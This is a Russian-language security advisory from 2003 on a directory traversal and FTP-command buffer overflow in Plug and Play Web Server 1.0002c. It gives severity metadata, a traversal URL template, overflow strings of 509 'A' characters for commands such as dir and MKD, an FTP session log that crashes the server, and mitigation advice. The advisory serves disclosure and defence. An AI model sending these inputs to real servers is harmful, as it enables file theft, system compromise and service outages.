Переполнение буфера и доступ к произвольным файлам в Plug and Play Web Server

Дата публикации:
22.09.2003
Всего просмотров:
861
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Plug and Play Web Server 1.x
Уязвимые версии: Plug and Play Web Server 1.0002c

Описание: Две уязвимости обнаружено в Plug and Play Web Server. Злонамеренный пользователь может раскрыть чувствительную информацию и скомпрометировать уязвимую систему.

  1. Удаленный атакующий может использовать последовательность обхода каталога ("../" или "..\"), чтобы получить доступ к произвольным файлам вне wwwroot каталога.
  2. Переполнение буфера обнаружено в нескольких параметрах в командах dir, ls, delete, mkdir, DELE, RMD, и MKD. В результате удаленный атакующий может выполнить произвольный код на уязвимом сервере.

Пример/Эксплоит:

1.

http://[victim]/../../existing_file
2.
dir [Ax509]

ls [Ax509]

delete [Ax509]

mkdir [Ax509]

DELE [Ax509]

RMD [Ax509]

MKD [Ax509]

Example:
--------------------
ftp> o 127.0.0.1
Connected to 127.0.0.1.
220 Plug and Play Web Server V1.0
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in
ftp> dir AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
200 PORT command successful
Connection closed by remote host.
ftp> o 127.0.0.1
> ftp: connect :Unknown error number
ftp>
--------------------

URL производителя:http://www.pandpsoftware.com/

Решение: Ограничьте доступ к FTP серверу только доверенным пользователям. Запретите доступ анонимному Web пользователю к чувствительным файлам на системе на уровне файловой системы.

Ссылки: Denial Of Service in Plug & Play Web (FTP) Server

или введите имя

CAPTCHA